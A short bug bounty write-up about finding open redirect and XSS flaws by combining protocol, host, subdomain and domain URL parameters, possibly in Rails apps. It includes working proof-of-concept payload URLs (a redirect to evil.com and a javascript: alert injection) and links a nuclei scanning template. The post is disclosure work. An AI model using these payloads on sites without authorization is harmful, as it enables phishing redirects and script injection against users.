How I found an XSS via multiple parameters
Hello everyone, after receiving a generous reward at Bugcrowd for an XSS, I would like to share a discovery from a Bug Bounty I found a while back while using a fuzzer to explore open redirects and XSS.
I found a way to exploit open redirects and XSS using multiple parameters in the URL that manipulate frontend links, possibly in Ruby On Rails applications, [and this is the 3rd time I’ve found this in a Bug Bounty program].
By using the parameters “?protocol=A&host=X&subdomain=B&domain=C” all together without exception in the URL, it forces the application to change some links in the HTML to href=”A://B.C,” allowing for open redirect and XSS exploitation.
In open redirect, it is exploitable using:
https://domain[.]com/?protocol=https&subdomain=evil&domain=com&host=X
This changes the links to href=https://evil.com
When using:
https://domain[.]com?protocol=javascript&subdomain=%25A0alert(document.domain)//&domain=X&host=X
The links become:
href=javascript://%A0alert(document.domain)//.C
And when the link is clicked, it executes the XSS:
And as mentioned above, an XSS was reported, and the company accepted it as a high-severity vulnerability and paid $1000 dollars through Bugcrowd:
For those who are interested, I created a nuclei template to explore and find this:
https://github.com/erickfernandox/nuclei-templates/blob/main/multiple-parameters-manipulation.yaml
